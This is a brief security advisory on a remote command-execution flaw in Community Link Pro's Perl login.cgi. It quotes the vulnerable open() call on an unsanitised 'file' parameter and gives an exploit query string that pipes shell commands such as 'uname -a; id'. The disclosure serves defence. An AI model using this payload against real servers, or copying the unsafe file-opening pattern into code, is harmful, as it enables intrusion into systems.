 Community Link Pro Command Execution (login.cgi)
------------------------------------------------------------------------

SUMMARY

Login.cgi is "a login script written in Perl by Community Link Pro Web
Editor that allows to a remote user to login in his own personal page".

Community Link Pro Web Editor has been found to be vulnerable to remote
code execution due lack of sanitation of 'file' parameter.

DETAILS

Vulnerable Code:
open(FILE2,
"$memberspath/$FORM{'username'}/$FORM{'file'}");
foreach (<FILE2>) {
  print;
}
close(FILE2);

The above code doesn't properly open the file for reading, this allows a
remote attacker to cause the program to open commands which it will
execute. The vulnerability can be exploited by simply passing commands as
the $file parameter, for example:
login.
cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.

command=simple&do=edit&password=&file=|uname -a; id|
